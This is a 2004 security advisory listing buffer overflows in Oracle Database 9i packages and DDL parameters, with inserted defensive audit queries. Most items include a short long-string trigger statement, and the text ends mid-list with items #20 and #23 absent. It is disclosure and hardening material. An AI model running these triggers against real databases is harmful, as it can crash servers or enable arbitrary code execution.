[NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/04

    To: list@securiteam.com
    Date: 2 Sep 2004 12:40:56 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Multiple Vulnerabilities in Oracle Database Server (40 Issues)
    ------------------------------------------------------------------------

    SUMMARY

    Multiple buffer overflow and denial of service (DoS) vulnerabilities exist
    in the Oracle Database Server that allow database users to take complete
    control over the database and optionally cause denial of service.

    DETAILS

    Please follow the links for details of the vulnerabilities:
    #1 - Buffer overflow in public procedure DROP_SITE_INSTANTIATION of
    DBMS_REPCAT_INSTANTIATE package
    Details:
    Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package, which
    is used in replicated environments to manage the instantiation of
    deployment templates. This package contains a public procedure,
    DROP_SITE_INSTANTIATION, that removes a template instantiation at a
    target site. When this procedure is called with a long string in the
    first parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION ('longstring','');
    END;

    Analysis:
    By default, EXECUTE on DBMS_REPCAT_INSTANTIATE is granted to PUBLIC, so
    any Oracle database user can exploit this vulnerability.

    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #2 - Buffer overflow in public function INSTANTIATE_OFFLINE of
    DBMS_REPCAT_INSTANTIATE package
    Details:
    Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package, which
    is used in replicated environments to manage the instantiation of
    deployment templates. This package contains a public function,
    INSTANTIATE_OFFLINE, that generates a script at the master site to create
    the materialized view environment at the remote materialized view site
    while offline. When this function is called with a long string in the
    first parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE ('longstring','') FROM
    Dual

    or

    DECLARE
    a NUMBER;
    BEGIN
    a := DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE('longstring','');
    END;

    Analysis:
    By default, EXECUTE on DBMS_REPCAT_INSTANTIATE is granted to PUBLIC, so
    any Oracle database user can exploit this vulnerability.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #3 - Buffer overflow in public function INSTANTIATE_ONLINE of
    DBMS_REPCAT_INSTANTIATE package
    Details:
    Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package, which
    is used in replicated environments to manage the instantiation of
    deployment templates. This package contains a public function,
    INSTANTIATE_ONLINE, that generates a script at the master site to create
    the materialized view environment at the remote materialized view site
    while online. When this function is called with a long string in the
    first parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE ('longstring','') FROM
    Dual

    Analysis:
    By default, EXECUTE on DBMS_REPCAT_INSTANTIATE is granted to PUBLIC, so
    any Oracle database user can exploit this vulnerability.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #4 - Buffer overflow on "gname" parameter on procedures of Replication
    Management API Packages
    Details:
    Oracle Database Server provides a set of packages that can be used to
    administer a replicated environment. Some procedures of these packages use
    the parameter "gname" to specify a group name. When a long string is
    passed to this parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.DROP_MASTER_REPGROUP ('longstring');
    END;

    or

    BEGIN
    DBMS_REPCAT.ALTER_MVIEW_PROPAGATION ('longstring', '');
    END;

    or

    BEGIN
    DBMS_OFFLINE_OG.BEGIN_LOAD ('longstring', 'x');
    END;

    or

    BEGIN
    DBMS_OFFLINE_SNAPSHOT.END_LOAD ('longstring', 'x', 'd');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the vulnerable
    packages.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #5 - Buffer overflow on "sname" and "oname" parameters on procedures of
    DBMS_REPCAT package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. Some
    procedures of this package use the parameter "sname" to specify a schema
    name and "oname" to specify an object name. When a long string is passed
    to either of these parameters, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.ADD_GROUPED_COLUMN ('longstring', 'longstring', 'cc','dd');
    END;

    or

    BEGIN
    DBMS_REPCAT.ADD_DELETE_RESOLUTION ('longstring', 'longstring', 0, '', '');
    END;

    or

    BEGIN
    DBMS_REPCAT.CANCEL_STATISTICS ('longstring', 'longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #6 - Buffer overflow on "type" parameter on procedures of DBMS_REPCAT
    package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. Some
    procedures of this package use the parameter "type" to specify the type of
    the object referenced by the other parameters. When a long string is
    passed to this parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.ALTER_MASTER_REPOBJECT ('', '', 'longstring', 'dd', 'ee',
    false,false);
    END;

    or

    BEGIN
    DBMS_REPCAT.COMMENT_ON_REPOBJECT ('', '', 'longstring', '');
    END;

    or

    BEGIN
    DBMS_REPCAT.DROP_MASTER_REPOBJECT ('aa', 'bb', 'longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #7 - Buffer overflow on "gowner" parameter on procedures of the
    DBMS_REPCAT package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. Some
    procedures of this package use the parameter "gowner" to specify the owner
    of the materialized view group. When a long string is passed to this
    parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.DROP_MVIEW_REPGROUP ('', false, 'longstring');
    END;

    or

    BEGIN
    DBMS_REPCAT.REFRESH_MVIEW_REPGROUP ('', false, false, false,
    'longstring');
    END;

    or

    BEGIN
    DBMS_REPCAT.REPCAT_IMPORT_CHECK ('longstring', false, 'longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #8 - Buffer overflow on "operation" parameter on procedures of DBMS_REPCAT
    package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. Some
    procedures of this package use the parameter "operation" to specify the
    kind of data operation ('update', 'delete' or both). When a long string is
    passed to this parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.COMPARE_OLD_VALUES ('hr', 'employees', 'employee_id',
    'longstring', true);
    END;

    or

    BEGIN
    DBMS_REPCAT.SEND_OLD_VALUES ('hr', 'employees',
    'employee_id','longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #9 - Buffer overflow in procedure CREATE_MVIEW_REPGROUP of DBMS_REPCAT
    package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. This
    package contains a procedure, CREATE_MVIEW_REPGROUP, used to create a new
    materialized view group in the local database. When this procedure is
    called with a long string in the fifth parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.CREATE_MVIEW_REPGROUP ('', '', '', '', 'longstring', '');
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the DBMS_REPCAT
    package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #10 - Buffer overflow in procedure GENERATE_REPLICATION_SUPPORT of
    DBMS_REPCAT package
    Details:
    Oracle Database Server provides the DBMS_REPCAT package, which is used to
    administer and update the replication catalog and environment. This
    package contains a procedure, GENERATE_REPLICATION_SUPPORT, used to
    generate the triggers and packages needed to support replication for a
    specified object. When this procedure is called with a long string in the
    "package_prefix" or "procedure_prefix" parameter, a buffer overflow
    occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT ('aa', 'bb', 'TABLE',
    'longstring','longstring', true, 'gg');
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the DBMS_REPCAT
    package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #11 - Buffer overflow in procedures REGISTER_USER_REPGROUP and
    UNREGISTER_USER_REPGROUP of DBMS_REPCAT_ADMIN package
    Details:
    Oracle Database Server provides the DBMS_REPCAT_ADMIN package, which is
    used to create users with the privileges needed by the symmetric
    replication facility. This package contains the procedures
    REGISTER_USER_REPGROUP and UNREGISTER_USER_REPGROUP, used to assign and
    revoke proxy materialized view administrator or receiver privileges at the
    master site or master materialized view site for use with remote sites.
    When either procedure is called with a long string in the
    "privilege_type" parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP ('sys', 'longstring', '');
    END;

    or

    BEGIN
    DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP ('sys', 'longstring', '');
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT_ADMIN package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #12 - Buffer overflow in functions INSTANTIATE_OFFLINE, INSTANTIATE_ONLINE
    and procedure DROP_SITE_INSTANTIATION of DBMS_REPCAT_RGT package
    Details:
    Oracle Database Server provides the DBMS_REPCAT_RGT package, which is used
    to control the maintenance and definition of refresh group templates. This
    package contains the functions INSTANTIATE_OFFLINE and INSTANTIATE_ONLINE
    and the procedure DROP_SITE_INSTANTIATION. When any of these is called
    with a long string in the "refresh_template_name" or the "user_name"
    parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL or PL/SQL:

    SELECT DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE ('longstring', '', '') FROM
    Dual;

    or

    SELECT DBMS_REPCAT_RGT.INSTANTIATE_ONLINE ('some_refresh_template_name',
    '', 'longstring') FROM Dual;

    or

    BEGIN
    DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION ('longstring', '', '');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permission on the DBMS_REPCAT_RGT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
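The queries below are an added example, not part of the SecuriTeam advisory, showing how a DBA can audit who is able to call the packages named in items #1 through #12 (and the CTX_OUTPUT, DBMS_SYSTEM and DBMS_REPCAT_FLA packages named later in this advisory), and how to remove the PUBLIC grant that items #1 to #3 depend on while a 9.2 instance waits for 9.2.0.5. They assume the packages live under SYS (CTX_OUTPUT under CTXSYS) and use APP_USER as a placeholder for the account under review.

```sql
-- Added example, not from the advisory. Run as a DBA: it reads DBA_* views.
-- 1. Every EXECUTE grant on the packages this advisory names, PUBLIC first.
--    A PUBLIC grant means every account on the instance can reach the
--    vulnerable entry points (items #1-#3); grants to roles such as
--    EXECUTE_CATALOG_ROLE explain the "members of ..." wording in #4-#12.
SELECT p.grantee,
       p.owner,
       p.table_name AS package_name,
       p.grantable
  FROM dba_tab_privs p
 WHERE p.privilege = 'EXECUTE'
   AND p.table_name IN ('DBMS_REPCAT_INSTANTIATE', 'DBMS_REPCAT', 'DBMS_REPCAT_ADMIN',
                        'DBMS_REPCAT_RGT', 'DBMS_OFFLINE_OG', 'DBMS_OFFLINE_SNAPSHOT',
                        'DBMS_REPCAT_FLA', 'DBMS_SYSTEM', 'CTX_OUTPUT')
 ORDER BY CASE WHEN p.grantee = 'PUBLIC' THEN 0 ELSE 1 END, p.table_name, p.grantee;

-- 2. Which of those packages one specific account can call, counting grants
--    it receives via PUBLIC or via any chain of nested roles. APP_USER is a
--    placeholder; substitute the account under review. SYSDBA connections
--    bypass object grants entirely; list those separately from V$PWFILE_USERS.
SELECT DISTINCT p.owner, p.table_name AS package_name, p.grantee AS granted_to
  FROM dba_tab_privs p
 WHERE p.privilege = 'EXECUTE'
   AND p.table_name IN ('DBMS_REPCAT_INSTANTIATE', 'DBMS_REPCAT', 'DBMS_REPCAT_ADMIN',
                        'DBMS_REPCAT_RGT', 'DBMS_OFFLINE_OG', 'DBMS_OFFLINE_SNAPSHOT',
                        'DBMS_REPCAT_FLA', 'DBMS_SYSTEM', 'CTX_OUTPUT')
   AND p.grantee IN (
         SELECT 'PUBLIC' FROM dual
         UNION ALL
         SELECT 'APP_USER' FROM dual
         UNION ALL
         SELECT rp.granted_role                -- every role reachable from APP_USER
           FROM dba_role_privs rp
          START WITH rp.grantee = 'APP_USER'
        CONNECT BY PRIOR rp.granted_role = rp.grantee)
 ORDER BY 1, 2, 3;

-- 3. Interim hardening for an instance that does not use deployment
--    templates: drop the PUBLIC grant behind items #1-#3. First list objects
--    outside SYS that reference the package, because the revoke invalidates
--    them (they recompile on next use; SYS-owned objects do not depend on the
--    PUBLIC grant). Applying Patchset 4 (9.2.0.5) remains the real fix.
SELECT d.owner, d.name, d.type
  FROM dba_dependencies d
 WHERE d.referenced_owner = 'SYS'
   AND d.referenced_name  = 'DBMS_REPCAT_INSTANTIATE'
   AND d.owner <> 'SYS';

REVOKE EXECUTE ON SYS.DBMS_REPCAT_INSTANTIATE FROM PUBLIC;
```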

    #13 - Buffer overflow on TEMPFILE parameter
    Details:
    Oracle Database Server allows temporary files to be specified for the
    database when creating or altering a tablespace, altering a database, and
    so on. When a long string is passed as the TEMPFILE parameter, a buffer
    overflow occurs.

    To reproduce the overflow, execute the following SQL:

    ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstringhere';

    or

    CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstringhere';

    or

    ALTER DATABASE TEMPFILE 'longstringhere' online;

    etc.

    Analysis:
    This vulnerability can be exploited through ALTER DATABASE by users with
    the ALTER DATABASE system privilege, through CREATE TABLESPACE by users
    with the CREATE TABLESPACE system privilege, and through ALTER TABLESPACE
    by users with the ALTER TABLESPACE system privilege. Exploitation of this
    vulnerability allows an attacker to execute arbitrary code. It can also be
    exploited to cause a denial of service (DoS) by killing the Oracle server
    process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

    #14 - Buffer overflow on LOGFILE parameter
    Details:
    Oracle Database Server allows redo log files to be added to the database
    with the ALTER DATABASE statement. When a long string is passed as the
    LOGFILE parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    ALTER DATABASE CLEAR LOGFILE 'longstringhere';

    or

    ALTER DATABASE RECOVER LOGFILE 'longstringhere';

    or

    ALTER DATABASE DROP LOGFILE MEMBER 'longstringhere';

    etc.

    Analysis:
    This vulnerability can be exploited by users with the ALTER DATABASE
    system privilege. Exploitation of this vulnerability allows an attacker to
    execute arbitrary code. It can also be exploited to cause a denial of
    service (DoS) by killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

    #15 - Buffer overflow on CONTROLFILE parameter
    Details:
    Oracle Database Server allows control files to be created and backed up
    for later use with the ALTER DATABASE statement. When a long string is
    passed as the CONTROLFILE parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    ALTER DATABASE BACKUP CONTROLFILE TO 'longstringhere';

    or

    ALTER DATABASE CREATE STANDBY CONTROLFILE AS 'longstringhere';

    etc.

    Analysis:
    This vulnerability can be exploited by users with the ALTER DATABASE
    system privilege. Exploitation of this vulnerability allows an attacker to
    execute arbitrary code. It can also be exploited to cause a denial of
    service (DoS) by killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

    #16 - Buffer overflow on FILE parameter
    Details:
    Oracle Database Server allows the data files used by the database to be
    renamed with the ALTER DATABASE statement. When a long string is passed
    as the FILE parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    ALTER DATABASE RENAME FILE 'longstringhere' TO 'anything';

    Analysis:
    This vulnerability can be exploited by users with the ALTER DATABASE
    system privilege.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

    #17 - Buffer overflow in Interval Conversion Functions
    Details:
    Oracle Database Server provides two functions, usable from PL/SQL, that
    convert numbers to date/time intervals. When either function is called
    with a long string as its second parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

    SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;

    Analysis:
    This vulnerability can be exploited by any Oracle Database user, because
    access to these functions cannot be restricted.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 3 (9.2.0.4) Patch 3. 10g Not vulnerable.

    #18 - Buffer overflow in String Conversion Function
    Details:
    Oracle Database Server provides a function, usable from PL/SQL, that
    converts a number or date to a string. When this function is called with
    SYSTIMESTAMP (a function that returns the system date, including
    fractional seconds and the time zone of the database) as its first
    parameter and a long string as its second parameter, a buffer overflow
    occurs.

    To reproduce the overflow, execute the following SQL:

    select TO_CHAR(SYSTIMESTAMP, 'longstringhere') from dual;

    Analysis:
    This vulnerability can be exploited by any Oracle Database user, because
    access to this function cannot be restricted.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process. Calling TO_CHAR with a first parameter
    other than SYSTIMESTAMP does not appear to cause a buffer overflow, but it
    should not be ruled out that other values could trigger one.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. Fixed in 10g Release 1.

    #19 - Buffer overflow in CTX_OUTPUT Package Function
    Details:
    Oracle Database Server provides many packages. One of them, CTX_OUTPUT,
    can be used to log indexing and document service requests, and it has a
    vulnerable function: when this function is called with a long string, a
    buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    begin
    CTX_OUTPUT.START_LOG('longstringhere');
    end;

    Analysis:
    This vulnerability can be exploited by members of the Oracle CTXAPP role,
    by the CTXSYS user and by users granted execute permission on the
    CTX_OUTPUT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not
    vulnerable.

    #21 - Buffer overflow on DATAFILE parameter
    Details:
    Oracle Database Server allows the data files in which data will be stored
    to be specified when creating a database, altering an index, and so on.
    When a long string is passed as the DATAFILE parameter, a buffer overflow
    occurs.

    To reproduce the overflow, execute the following SQL:

    ALTER DATABASE datafile 'longstringhere' ONLINE;

    or

    ALTER INDEX indexname allocate extent(datafile 'longstringhere');

    or

    CREATE TABLESPACE tablespacename DATAFILE 'longstringhere';

    or

    ALTER CLUSTER clustername allocate extent(datafile 'longstringhere');

    etc.

    Analysis:
    This vulnerability can be exploited in several ways:

     1. using ALTER INDEX by users who have their own schema and by users
    with the ALTER ANY INDEX system privilege
     2. using ALTER DATABASE by users with the ALTER DATABASE system privilege
     3. using CREATE TABLESPACE by users with the CREATE TABLESPACE system
    privilege
     4. using ALTER CLUSTER by users who have their own schema and by users
    with the ALTER ANY CLUSTER system privilege

    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not
    vulnerable.
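As an added example that is not part of the advisory, the queries below let a DBA enumerate which accounts hold the system privileges that the DDL paths in items #13 through #16 and #21 require, including privileges that arrive through nested roles. Only 9i-era hierarchical SQL is used (no CONNECT_BY_ROOT or NOCYCLE), so it runs on the affected 9.2 releases; the own-schema ALTER INDEX and ALTER CLUSTER paths in #21 are open to any account that owns an index or cluster and are not captured by a grant audit.

```sql
-- Added example, not from the advisory. Run as a DBA (reads DBA_* views).
-- 1. System privileges granted directly to accounts.
SELECT sp.grantee AS account, sp.privilege, 'DIRECT' AS via
  FROM dba_sys_privs sp
 WHERE sp.privilege IN ('ALTER DATABASE', 'CREATE TABLESPACE', 'ALTER TABLESPACE',
                        'ALTER ANY INDEX', 'ALTER ANY CLUSTER')
   AND sp.grantee IN (SELECT username FROM dba_users)   -- accounts, not roles
 ORDER BY 1, 2;

-- 2. Roles that carry the same privileges (DBA will always appear here).
SELECT sp.grantee AS role, sp.privilege
  FROM dba_sys_privs sp
 WHERE sp.privilege IN ('ALTER DATABASE', 'CREATE TABLESPACE', 'ALTER TABLESPACE',
                        'ALTER ANY INDEX', 'ALTER ANY CLUSTER')
   AND sp.grantee IN (SELECT role FROM dba_roles)
 ORDER BY 1, 2;

-- 3. Accounts that end up with one of those roles, directly or through a
--    chain of nested roles. The walk starts at each privileged role and
--    follows DBA_ROLE_PRIVS towards whoever was granted it; the WHERE clause
--    is applied after the hierarchy is built, so intermediate roles are
--    traversed but only real accounts are reported. Oracle refuses circular
--    role grants, so the walk always terminates. The first name in
--    ROLE_CHAIN is the role that holds the privilege (see query 2).
SELECT DISTINCT
       rp.grantee AS account,
       SUBSTR(SYS_CONNECT_BY_PATH(rp.granted_role, ' -> '), 5) AS role_chain
  FROM dba_role_privs rp
 WHERE rp.grantee IN (SELECT username FROM dba_users)
 START WITH rp.granted_role IN (
         SELECT sp.grantee
           FROM dba_sys_privs sp
          WHERE sp.privilege IN ('ALTER DATABASE', 'CREATE TABLESPACE', 'ALTER TABLESPACE',
                                 'ALTER ANY INDEX', 'ALTER ANY CLUSTER')
            AND sp.grantee IN (SELECT role FROM dba_roles))
CONNECT BY PRIOR rp.grantee = rp.granted_role
 ORDER BY 1, 2;
```

Accounts that appear only in query 3 hold the privilege through a role and lose it as soon as that role grant is revoked, which is usually the least disruptive trim while the 9.2.0.5 Patch 2 fix is being scheduled.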

    #22 - Buffer overflow in DBMS_SYSTEM package function
    Details:
    Oracle Database Server provides many packages. One of them, DBMS_SYSTEM,
    can be used to gather information about events set in the current
    session. It can also be used to manipulate other users' sessions and
    change the values of certain init.ora parameters. It contains a
    vulnerable function that causes a buffer overflow when called with a long
    string in the second parameter.

    To reproduce the overflow, execute the following PL/SQL:

    begin
    DBMS_SYSTEM.KSDWRT(2,'longstringhere');
    end;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permission on the DBMS_SYSTEM package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

    #24 - Buffer overflow on "fname" parameter of the DBMS_REPCAT* packages
    Details:
    Oracle Database Server provides the DBMS_REPCAT* packages, which are used
    to administer and update the replication catalog and environment. Some
    procedures of these packages use the parameter "fname". When a long string
    is passed to this parameter, a buffer overflow occurs.

    To reproduce the overflow, execute the following PL/SQL:

    BEGIN
    SYS.DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED('', 'longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA roles, and by users granted execute permission on the
    DBMS_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

    #25 - Buffer overflow on procedures of the Replication Management API
    packages
    Details:
    Oracle Database Server provides a set of packages that can be used to
    administer a replicated environment. Some procedures of these packages are
    vulnerable to a buffer overflow.

    The vulnerable procedures are:
    DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE
    DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE
    DBMS_INTERNAL_REPCAT.VALIDATE
    DBMS_OFFLINE_OG.BEGIN_FLAVOR_CHANGE
    DBMS_OFFLINE_OG.BEGIN_INSTANTIATION
    DBMS_OFFLINE_OG.BEGIN_LOAD
    DBMS_OFFLINE_OG.END_FLAVOR_CHANGE
    DBMS_OFFLINE_OG.END_INSTANTIATION
    DBMS_OFFLINE_OG.END_LOAD
    DBMS_OFFLINE_OG.RESUME_SUBSET_OF_MASTERS
    DBMS_OFFLINE_RGT.ADD_CONFLICT_OFFLINE
    DBMS_OFFLINE_RGT.ADD_FLAVOR_OBJECT_OFFLINE
    DBMS_OFFLINE_RGT.ADD_GROUPED_COLUMN_OFFLINE
    DBMS_OFFLINE_RGT.ADD_INTERNAL_PKG
    DBMS_OFFLINE_RGT.ADD_MASTER_OFFLINE
    DBMS_OFFLINE_RGT.ADD_PARAMETER_COLUMN_OFFLINE
    DBMS_OFFLINE_RGT.ADD_PRIORITY_GROUP_OFFLINE
    DBMS_OFFLINE_RGT.ADD_PRIORITY_OFFLINE
    DBMS_OFFLINE_RGT.ADD_REPCOLUMN_OFFLINE
    DBMS_OFFLINE_RGT.ADD_REPOBJECT_OFFLINE
    DBMS_OFFLINE_RGT.ADD_RESOLUTION_OFFLINE
    DBMS_OFFLINE_RGT.ADD_SNAPMASTER_OFFLINE
    DBMS_OFFLINE_SNAPSHOT.BEGIN_LOAD
    DBMS_OFFLINE_SNAPSHOT.END_LOAD
    DBMS_RECTIFIER_DIFF.DIFFERENCES
    DBMS_RECTIFIER_DIFF.RECTIFY
    DBMS_REPCAT.ABORT_FLAVOR_DEFINITION
    DBMS_REPCAT.ADD_COLUMN_GROUP_TO_FLAVOR
    DBMS_REPCAT.ADD_COLUMNS_TO_FLAVOR
    DBMS_REPCAT.ADD_DELETE_RESOLUTION
    DBMS_REPCAT.ADD_GROUPED_COLUMN
    DBMS_REPCAT.ADD_MASTER_DATABASE
    DBMS_REPCAT.ADD_OBJECT_TO_FLAVOR
    DBMS_REPCAT.ADD_PRIORITY_CHAR
    DBMS_REPCAT.ADD_PRIORITY_DATE
    DBMS_REPCAT.ADD_PRIORITY_NCHAR
    DBMS_REPCAT.ADD_PRIORITY_NUMBER
    DBMS_REPCAT.ADD_PRIORITY_NVARCHAR2
    DBMS_REPCAT.ADD_PRIORITY_RAW
    DBMS_REPCAT.ADD_PRIORITY_VARCHAR2
    DBMS_REPCAT.ADD_SITE_PRIORITY_SITE
    DBMS_REPCAT.ADD_UNIQUE_RESOLUTION
    DBMS_REPCAT.ADD_UPDATE_RESOLUTION
    DBMS_REPCAT.ALTER_MASTER_PROPAGATION
    DBMS_REPCAT.ALTER_MASTER_REPOBJECT
    DBMS_REPCAT.ALTER_MVIEW_PROPAGATION
    DBMS_REPCAT.ALTER_PRIORITY
